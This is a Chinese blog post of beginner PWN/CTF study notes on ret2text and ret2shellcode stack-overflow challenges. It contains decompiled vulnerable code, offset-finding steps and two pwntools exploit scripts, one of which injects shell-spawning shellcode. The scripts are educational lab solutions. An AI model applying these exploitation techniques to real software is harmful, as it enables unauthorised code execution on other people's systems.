PWN学习笔记

最新推荐文章于 2023-03-17 23:40:48 发布
最新推荐文章于 2023-03-17 23:40:48 发布
阅读量450 收藏
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33624424/article/details/107784220
版权

PWN学习笔记

环境准备

  • Ubuntu 18 (Ubuntu 20 好多题目程序运行不了)
  • pwntools
  • gdb & pwndbg
  • IDA Pro

题目

ret2text

打开IDA Pro

PfUNI.png

看到一个get_shell、vulnerable、main函数。

main函数调用了vulnerable函数。

int vulnerable()
{
  char buffer[8]; // [esp+8h] [ebp-10h]

  gets(buffer);
  return 0;
}

这里只要让栈溢出后接入get_shell的地址就能调用get_shell函数了。

使用 IDA PRO 找到get_shell函数的地址:0x08048522

使用GDB调试出偏移量

Pfry1.png

0xffffcf78 - 0xffffcf68 = 16

16在加4就是偏移量

from pwn import *
context(os='linux',arch='i386',log_level='debug')
io = process("ret2text")
payload = b'a' * 20 + p32(0x08048522)
io.sendline(payload)
io.interactive()

ret2shellcode

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No system for you this time !!!");
  gets(&s);
  strncpy(buf2, &s, 0x64u);
  printf("bye bye ~");
  return 0;
}

这里将s 拷贝给buf2

首先要找到buf2的地址:0x0804A080

用 cyclic 1000 生成1000个垃圾字符

gdb ret2shellcode

run

然后输入1000个垃圾字符

PfF2m.png

cyclic -l 0x62616164

得到112

from pwn import *

context(os='linux',arch='i386',log_level='debug')
io = process("ret2shellcode")
shellcode = asm(shellcraft.i386.linux.sh())
payload = shellcode.ljust(112,'A') + p32(0x0804A080)
io.sendline(payload)
io.interactive()
skyxmao
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
OpenAIS学习笔记
hanyueqi的专栏
03-30 1876
OpenAIS 概况 资源、服务与节点关系:资源(vip、httpd、filesystem)或多个资源组合,服务运行在某个主机上,所有资源同时运行在一个节点上;资源类型:原生资源(运行于一个节点)、组资源、克隆资源、主从资源;资源故障转移:资源粘性(是否能远离该节点),位置约束,排列约束(优先运行),顺序次序(操作顺序); 节点存在方式 节点成员;等同的
nlp学习笔记
Qiushuiyijiang的博客
11-08 373
nlp难点 一个意思具有多种表达方式;而是一词多义(Ambiguity); 如何解决一词多义现象:在没有上下文(context)的情况下,可以主观判断一下; 搭建一个机器翻译系统:从语料库中匹配目标单词,其缺点在于:语法不对,速度慢可以通过AI的方法(模型)解决。如何保证语法的正确性:中文首先要分词,找到对应词,对词进行排列组合,将组合应用在模型(Language Model)上,得到一个概率,选最好的。其中的计算量特别大,采用算法解决。 Decoding algorithm and viterb algo
PWN入门笔记
WuXianYo_的博客
03-10 144
PWN入门笔记
PWN学习总结(不断完善中)(有道云笔记
tbsqigongzi的博客
04-26 3359
学习路线 pwn一些概念理解 王爽汇编学习笔记 DOS-BOX及编译工具–百度网盘 提取码: ajba linux知识学习(CTF主要考察linux环境下的漏洞利用)—菜鸟教程 nala包管理命令(个人感觉比apt好用) python知识学习(写exp用)----菜鸟教程 gcc编译过程(了解一下) vim用法(好难,正在学) pacvim游戏 ctf-wiki-pwn漏洞利用总结图 刷题网站 BUUCTF BUUCTF—libc源码 攻防世界 pwn环境搭建 借用另一个博主的pwn环境配置文章 再加上几个
PWN入门(2)栈溢出基础
农夫果园好好喝的博客
06-29 788
PWN栈溢出基础。
CTF(PWN基础学习笔记)
WuXianYo_的博客
03-17 383
3.进入目标函数后,选择其中的可能出现漏洞的子函数,双击进入该函数的反编译后的C语言界面。2.找到目标函数,选择目标函数的任意代码段,F5将该函数的汇编语言一键反编译为C语言。*shift+F12,字符串表,可根据字符串查找该字符串所在函数的位置。*某些函数无C语言代码,无法反编译为C语言代码,如start()*功能键冲突(如shift+F12),可加Fn消除冲突。运行,显示出寄存器,汇编码,栈,函数关系 四栏信息。,链接本地端口展开攻击,完成后再链接远程端口。*可将C语言代码拷贝到汇编代码中进行对照。
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwncollege:部署pwn.college
02-24
大学 该存储库具有部署pwn.college实例所需的工件。 设置 docker build -t pwncollege_challenge containers/pwncollege_challenge cp -r CTFd-pwn-college-plugin CTFd/CTFd/plugins docker-compose up -d docker run --detach --name nginx-proxy --publish 80:80 --publish 443:443 --volume /etc/nginx/certs --volume $PWD /conf/nginx/vhost.d:/etc/nginx/vhost.d --volume /usr/share/nginx/html --volume /var/run/docker.sock:/tmp/docker.soc
pwn学习入门详解PPT
04-17
包括Windows内核学习,格式化字符串,栈溢出等方面
2024NKCTF-pwn
03-25
2024NKCTF_pwn
PWN-汇编学习笔记
yajuanpi4899的博客
01-09 3266
目录 一、汇编和PWN的关系 二、常用知识点 三、windows下搭建debug实验环境 一、汇编和PWN的关系 PWN需要对逆向了解,调试模式中会产生大量的汇编代码解读,需要对汇编有一定的基础。本文基于《汇编语言》第四版 王爽 一书进行一定知识点的提取和总结。 二、常用知识点 8086的CPU通用寄存器均为16位,可以存放两个字节,AX,BX,CX,DX四个寄存器存一般性数据。 ah:AX高位寄存器 al:AX地位寄存器 字节(byte):8位bit,存在8位寄存器中 字(wo
pwn 暑假复习二 简单rop
SsMing的博客
07-14 2052
例一:ret2shellcode 先复习一下计算与ebp的距离的方法,昨天复习的是用pattern来寻找,今天复习另一种,以ctfwiki的ret2text为例。先用ida打开查看源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvb...
PWN学习笔记(1)
Jason_ZhouYetao的博客
07-16 2766
首先来说说pwn,这个水还是很深的,不过我学习pwn的原因是我觉得pwn是最接近黑客的东西,当然web也是我考虑的一个方向,但是pwn更加偏向于对代码这方面的知识,所以我也就选择了pwn这个方向。 0x1 首先pwn的最基本的东西就是c语言,一般的pwn题目都是以c代码来出的题目,所以学好c是做pwn的前提,之后还需要一定的Linux命令的基础和各种插件的使用(比如在溢出这块还是以gdb的pe...
pwn|软件安全相关问题学习笔记
柷敔的博客
04-16 1395
软件安全相关问题比较琐碎,很多东西一时间记住了但是之后又忘掉了,因此以此文来荟萃各种零零散散的知识点,以备不虞。
分布式电网动态电压恢复器模拟装置设计与实现.doc
最新发布
07-06
本装置采用DC-AC及AC-DC-AC双重结构,前级采用功率因数校正(PFC)电路完成AC-DC变换,改善输入端电网电能质量。后级采用单相全桥逆变加变压器输出的拓扑结构,输出功率50W。整个系统以TI公司的浮点数字信号控制器TMS320F28335为控制电路核心,采用规则采样法和DSP片内ePWM模块功能实现SPWM波,采用DSP片内12位A/D对各模拟信号进行采集检测,简化了系统设计和成本。本装置具有良好的数字显示功能,采用CPLD自行设计驱动的4.3英寸彩色液晶TFT-LCD非常直观地完成了输出信号波形、频谱特性的在线实时显示,以及输入电压、电流、功率,输出电压、电流、功率,效率,频率,相位差,失真度参数的正确显示。本装置具有开机自检、输入电压欠压及输出过流保护,在过流、欠压故障排除后能自动恢复。
英飞凌TC264学习PWN
10-18
好的,关于英飞凌TC264学习PWN,我可以给你一些指导。 首先,PWN是指利用程序漏洞进行攻击的技术,通常用于渗透测试和漏洞挖掘。而英飞凌TC264是一款基于ARM Cortex-M4内核的微控制器,它的安全性取决于程序的编写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值